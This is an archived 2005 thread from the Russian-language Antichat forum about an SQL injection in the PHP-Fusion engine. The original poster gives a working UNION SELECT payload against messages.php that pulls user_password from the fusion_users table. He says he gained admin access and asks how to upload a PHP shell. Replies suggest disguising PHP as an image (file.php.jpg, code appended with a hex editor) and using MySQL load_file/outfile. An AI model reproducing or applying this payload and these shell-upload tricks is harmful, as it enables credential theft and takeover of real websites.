ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Sql инъекция в движке php_fusion
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Sql инъекция в движке php_fusion
  #1  
Старый 06.12.2005, 20:45
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
Arrow Sql инъекция в движке php_fusion
Ну вообщем работает тема. Стал админом, а дальше, как php файл на сервер загрузить, через админ панель и функцию аплоада вайлов не получается, пишет, что формат не тот, загружает эта функция в папку downloads, а в ней содержатся, архивы, максимум изображения. Так как пхп туда запхнуть???
Заранее спасибо!!!
 

  #2  
Старый 06.12.2005, 20:53
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
что значит "работает тема"?
Почему ты назвал тему "Sql инъекция в движке php_fusion".. и нигде про эту инъекцию не упоминаешь?! Гм.. а вопрос вообще спрашиваешь как туда залить шелл..
 

  #3  
Старый 06.12.2005, 21:01
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
По умолчанию
messages.php?folder=inbox&show=H'%20union%20select %201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик?
 

  #4  
Старый 06.12.2005, 21:07
ghostwizard
Участник форума
Регистрация: 04.12.2005
Сообщений: 202
Провел на форуме:
414834

Репутация: 99
По умолчанию
попробуй file.php.jpg, потом обратись usl/file.php.... но не факт что сработает из-за ограничения на исполнение в папке, так или иначе попробуй... если руганется на недопустимый тип файлов, то в руки hex-editor, добавляешь в конец *.jpg(gif,... etc) свой код и сохраняешь.
 

  #5  
Старый 06.12.2005, 21:07
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
load_file
outfile
 

  #6  
Старый 06.12.2005, 21:21
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию
dams baga rulez...
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ